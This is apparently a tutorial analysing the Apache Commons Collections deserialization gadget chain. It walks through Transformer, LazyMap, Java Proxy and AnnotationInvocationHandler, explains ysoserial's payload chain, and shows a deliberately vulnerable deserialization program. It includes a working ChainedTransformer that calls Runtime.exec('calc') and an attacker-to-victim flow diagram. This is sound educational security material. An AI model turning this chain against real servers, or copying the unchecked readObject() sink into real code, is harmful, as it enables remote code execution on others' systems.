# Depth Analysis of Apache Commons Collections Gadget Chain
## Install the vulnerable version and setup environment
Download at [oracle.com](https://www.oracle.com/asean/java/technologies/javase/javase8-archive-downloads.html).

Then run the `tar` command to extract it to `jdks` folder.
```bash
tar -xzf jdk-8u65-linux-x64.tar.gz -C ./jdks/
```
Then install the "Extension Pack for Java" extension in Visual Studio Code. To use the JDK 1.7.0 80 version, goes into "User Settings" and type the following.

To create a simple Java project, we can go into "Ctrl + P" and choose Create a Java project, using the Maven option.
> Apache Maven is a powerful project management and build automation tool used primarily for Java-based projects.
## Understand normal Java project
Typical Java project structure:
```
my-project/
├── src/
│ ├── main/
│ │ ├── java/ ← The Java source code (.java files)
│ │ │ └── com/example/app/
│ │ │ ├── Main.java
│ │ │ ├── models/
│ │ │ └── utils/
│ │ └── resources/ ← Config files, XML, properties
│ └── test/
│ └── java/ ← Unit tests
├── target/ (Maven) or build/ (Gradle)
│ └── *.jar ← Compiled output (bytecode)
├── pom.xml ← Maven: dependency & build config
├── build.gradle ← Gradle: alternative build config
└── README.md
```
`pom.xml`: declares dependencies (libraries)
`*.java`: the source code
`*.class`: compiled bytecode. It can be decompiled back to Java.
`*.jar`: archive of `.class` files. This is the actual deployable app.
`*.war/*.ear`: web app archives.
`resources/`: config, XML, serialized objects. This folder often stores `.ser` files.
---
In Java, any class that implements the `Serializable` class can be serialized, which has potential insecure deserialization vulnerability.
```java
import java.io.Serializable;
public class User implements Serializable {
public String username;
public String role;
}
```
The deserialization in Java happens when the method `readObject()` is called. It is the sink.
```java
ObjectInputStream ois = new ObjectInputStream(inputStream);
Object obj = ois.readObject(); // sink here
```
---
## Java Web App Structure
```
webapp/
├── WEB-INF/
│ ├── web.xml ← Servlet mappings (entry points)
│ ├── classes/ ← Compiled .class files
│ └── lib/ ← Bundled JARs (check for ysoserial gadget libs)
└── index.jsp
```
Usually look for `lib/` folder that contains old versions, like `commons-collections`, `groovy`, etc.
---
## Understand Apache Commons Collections Gadget Chain
### Transformer and its implementations
The Java Collections Framework was a major addition in Java 1.2. It added many powerful data structures that accelerate development of most significant Java applications. Since that time it has become the recognised standard for collection handling in Java.
Commons-Collections seek to build upon the JDK classes by providing new interfaces, implementations and utilities.
One of them is the `Transformer` interface (transforming decorators that alter each object as it is added to the collection). Transformers are typically used for type conversions, or extracting data from an object.
```java
@FunctionalInterface
public interface Transformer<T, R> extends Function<T, R> {
@Override
default R apply(final T t) {
return transform(t);
}
/**
* Transforms the input object into some output object.
* <p>
* The input object SHOULD be left unchanged.
* </p>
*
* @param input the object to be transformed, should be left unchanged
* @return a transformed object
* @throws ClassCastException (runtime) if the input is the wrong class
* @throws IllegalArgumentException (runtime) if the input is invalid
* @throws FunctorException (runtime) if the transform cannot be completed
*/
R transform(T input);
}
```
`Transformer` is just a simple interface.
One of the implementation is `InvokerTransformer`, which creates a new object instance by reflection. The implementation of `InvokerTransformer` can be read at [InvokerTransformer.java](https://github.com/apache/commons-collections/blob/master/src/main/java/org/apache/commons/collections4/functors/InvokerTransformer.java).
The second one is `ConstantTransformer`, which returns the same constant each time. The implementation of it can be read at [ConstantTransformer.java](https://github.com/apache/commons-collections/blob/master/src/main/java/org/apache/commons/collections4/functors/ConstantTransformer.java).
Another implementation is `ChainedTransformer`, which chains the specified transformers together. Simply understand that the output of step $N$ will be the input of step $N+1$. Source code: [here](https://github.com/apache/commons-collections/blob/master/src/main/java/org/apache/commons/collections4/functors/ChainedTransformer.java).
Example of `ChainedTransformer`:
```java
Transformer[] chain = new Transformer[]{
new ConstantTransformer(Runtime.class), // always returns Runtime.class
new InvokerTransformer("getMethod", // calls Runtime.class.getMethod("getRuntime")
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", // calls the Method object → returns Runtime instance
new Class[]{Object.class, Object[].class},
new Object[]{null, null}),
new InvokerTransformer("exec", // calls runtime.exec("calc")
new Class[]{String.class},
new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(chain);
chainedTransformer.transform("anything"); // triggers the whole chain
```
First, the `ConstantTransformer(Runtime.class)` will always return `Runtime.class`. So this is the output of step 1 and `Runtime.class` will be the input of step 2.
Then, the `InvokerTransformer("getMethod", ...)` calls the `getMethod` method on `Runtime.class`, with argument "getRuntime". It produces `Runtime.class.getMethod("getRuntime")`.
> Step 2 only returns a method, it is not a Runtime object that executes the method.
At step 3, it uses `InvokerTransformer("invoke", ...)` to create a live `Runtime` instance.
Finally, the `Runtime` instance is inputted to `InvokerTransformer("exec")`, which executes the `exec` function with parameter "calc".
### LazyMap
`LazyMap` is a `Map` wrapper. It decorates another `Map` to create objects in the map on demand.
In `LazyMap` implementation, the `get` function is implemented as follow.
```java
@Override
public V get(final Object key) {
// create value for key if key is not currently in the map
if (!map.containsKey(key)) {
@SuppressWarnings("unchecked")
final K castKey = (K) key;
final V value = factory.apply(castKey);
map.put(castKey, value);
return value;
}
return map.get(key);
}
```
When we call `.get(key)` and the key does not exist, the `LazyMap` calls `apply` function to "create" the value. The `factory` is defined as
```java
protected final Transformer<? super K, ? extends V> factory;
```
In `Transformer` implementation, the `apply` function is
```java
@Override
default R apply(final T t) {
return transform(t);
}
```
Interesting, so when a key does not exist, it calls `transformer.transform(key)`. Remember at the previous section about `Transformer`, in the `ChainedTransformer`, we can perform a RCE through the `transform` function.
So, we can combine the `LazyMap` and `Transformer` to perform a RCE vulnerability.
---
## Understand Java Proxy
`Proxy` provides static methods for creating objects that act like instances of interfaces but allow for customized method invocation. In general, a Java Proxy is a fake object that intercepts every method call and redirects it to a handler. Read more about [Anatomy of a Java Proxy](https://marschall.github.io/2017/07/11/java-proxy-anatomy.html).
We need to understand the [java.lang.reflect.Proxy](https://docs.oracle.com/javase/8/docs/api/java/lang/reflect/Proxy.html) (superclass of all proxies, allows to create new proxy instances) and [java.lang.reflect.InvocationHandler](https://docs.oracle.com/javase/8/docs/api/java/lang/reflect/InvocationHandler.html) (the handler called by generated proxy) class to understand how proxies work in Java.
A new proxy instance is created via the following code.
```java
/**
* @param loader the class loader to define the proxy class, may be
* null to represent the bootstrap class loader
* @param interfaces the list of interfaces for the proxy class
* to implement
* @param h the invocation handler to dispatch method invocations to
* @return a proxy instance with the specified invocation handler of a
* proxy class that is defined by the specified class loader
* and that implements the specified interfaces
*/
public static Object newProxyInstance(ClassLoader loader,
Class<?>[] interfaces,
InvocationHandler h) {
Objects.requireNonNull(h);
/*
* Look up or generate the designated proxy class and its constructor.
*/
Constructor<?> cons = getProxyConstructor(loader, interfaces);
return newProxyInstance(cons, h);
}
private static Object newProxyInstance(Constructor<?> cons, InvocationHandler h) {
/*
* Invoke its constructor with the designated invocation handler.
*/
try {
return cons.newInstance(new Object[]{h});
} catch (IllegalAccessException | InstantiationException e) {
throw new InternalError(e.toString(), e);
} catch (InvocationTargetException e) {
Throwable t = e.getCause();
if (t instanceof RuntimeException re) {
throw re;
} else {
throw new InternalError(t.toString(), t);
}
}
}
```
From the code, we know that every method call in the proxy instance is redirected to the corresponding implementation of `InvocationHandler` interface.
```java
public interface InvocationHandler {
/**
* Processes a method invocation on a proxy instance and returns
* the result. This method will be invoked on an invocation handler
* when a method is invoked on a proxy instance that it is
* associated with.
*/
public Object invoke(Object proxy, Method method, Object[] args)
throws Throwable;
...
}
```
The `InvocationHandler` code indicates that the `invoke` method of the `InvocationHandler`'s implemenation is called whenever a method of the proxy instance is called.
An example:
```java
// Create a proxy for Map
Map proxyMap = (Map) Proxy.newProxyInstance(
Map.class.getClassLoader(),
new Class[]{Map.class},
handler // The handler function
);
// Any method called on proxyMap goes to handler.invoke()
proxyMap.entrySet(); // doesn't call entrySet(), but calls handler.invoke() instead
proxyMap.get("x"); // calls handler.invoke()
proxyMap.size(); // calls handler.invoke()
```
---
## Understand the Payload
We can use [ysoserial](https://github.com/frohoff/ysoserial) to create the payload for `CommonsCollections` library.
If we dump the payload using a third-party tool (I use `SerializationDumper`), we can see that it uses
1. `AnnotationInvocationHandler`
2. `LazyMap`
3. `ChainedTransformer`
4. `InvokerTransformer`
5. `ConstantTransformer`
The call chain would be as follow.
```
readObject()
│
▼
AnnotationInvocationHandler.readObject()
│ calls memberValues.entrySet()
▼
LazyMap.get(key) ← Triggers the transformer
│ key not in map → calls factory.transform(key)
▼
ChainedTransformer.transform() ← Runs transformers in sequence
│
├─► ConstantTransformer.transform() → returns Runtime.class (ignores input)
│
├─► InvokerTransformer.transform() → Runtime.class.getMethod("getRuntime")
│
├─► InvokerTransformer.transform() → getRuntime.invoke(null) = Runtime instance
│
├─► InvokerTransformer.transform() → runtime.exec("calc.exe")
│
▼
calc.exe launches
```
Have you ever wondered why these classes are used?
First, we need to understand the `readObject()` function.
```
Serializable classes that require special handling during the
serialization and deserialization process should implement the following
methods:
* private void writeObject(java.io.ObjectOutputStream stream)
* throws IOException;
* private void readObject(java.io.ObjectInputStream stream)
* throws IOException, ClassNotFoundException;
* private void readObjectNoData()
* throws ObjectStreamException;
```
So we can override the `readObject()` to customize the deserialization process.
That means, we need to find a class that implements `Serializable`, has a custom `readObject()` method, and inside the `readObject()` there are some methods called by a map instance (we need to override it with `LazyMap` to trigger RCE) .
And so `AnnotationInvocationHandler` fits perfectly. Its implementation is as follow.
```java
class AnnotationInvocationHandler implements InvocationHandler, Serializable {
...
private final Map<String, Object> memberValues;
...
private void readObject(java.io.ObjectInputStream s)
throws java.io.IOException, ClassNotFoundException {
...
Map<String, Object> streamVals = (Map<String, Object>)fields.get("memberValues", null);
...
// If there are annotation members without values, that
// situation is handled by the invoke method.
for (Map.Entry<String, Object> memberValue : streamVals.entrySet()) {
...
}
}
}
```
In the custom `readObject` method of `AnnotationInvocationHandler`, it calls the `entrySet` method on the `streamVals`. `streamVals` is from the `memberValues` attribute of the class, it reads the `memberValues` field from the serialized bytes.
If we can poison the `memberValues` attribute with a map proxy, then we can hook the `entrySet` function to call the `invoke()` function of the hander instead. The question is, what invocation handler should we set for the map proxy, such that when the `invoke` method is called, we can trigger the chain.
Looking at the `invoke` function of `AnnotationInvocationHandler`.
```java
public Object invoke(Object proxy, Method method, Object[] args) {
String member = method.getName();
...
Object result = memberValues.get(member);
...
}
```
Hmm, it has `memberValues.get(member)`. What if `memberValues` is `LazyMap`? Then we can trigger the RCE chain.
So that means, the invocation handler for the map proxy must be the second `AnnotationInvocationHandler` object, but in this case, it's `memberValues` attribute is the `LazyMap`.
Done! We have understood all the pieces.
A full picture:
```
AIH = AnnotationInvocationHandler
Attacker builds:
AIH { memberValues = proxyMap (InvocationHandler = AIH_2 { memberValues = LazyMap} ) }
↓
Serializes it to bytes
↓
Sends bytes to victim
Victim's server:
ois.readObject()
→ Java sees: class is AIH and has custom readObject()
→ Java calls: AIH.readObject()
→ this.memberValues.entrySet()
→ Proxy intercepts
→ AIH_2.invoke()
→ lazyMap.get()
→ ChainedTransformer
→ Runtime.exec("calc") ← RCE
```
---
## Debug Insecure-Deserialization project
Prepare a simple program that reads and deserializes object from a file.
```java
// src/main/java/com/example/Main.java
package com.example;
import java.io.FileInputStream;
import java.io.ObjectInputStream;
import java.util.Scanner;
public class Main {
public Main() {
}
public static void main(String[] args) {
Scanner scanner = new Scanner(System.in);
System.out.println("Enter filename to deserialize:");
String filename = scanner.nextLine();
scanner.close();
try {
// Opens the file as a raw byte stream
FileInputStream fileInputStream = new FileInputStream(filename);
// Wraps the byte stream in an ObjectInputStream: this is the class that
// knows how to reconstruct Java objects from bytes
ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
// Performs the deserialization; the sink here
Object obj = objectInputStream.readObject();
objectInputStream.close();
fileInputStream.close();
System.out.println("Deserialized object: " + obj.toString());
} catch (Exception e) {
System.err.println("Error during deserialization: " + e.getMessage());
}
}
}
```
As we have completed setting up the vulnerable environment, now we can debug to see the chain flow using the `Run and Debug` in vscode. Set the breakpoint at `Object obj = objectInputStream.readObject();`.
There are many blogs that talk about the debugging of the payload, you can reference to them to see the debug flow.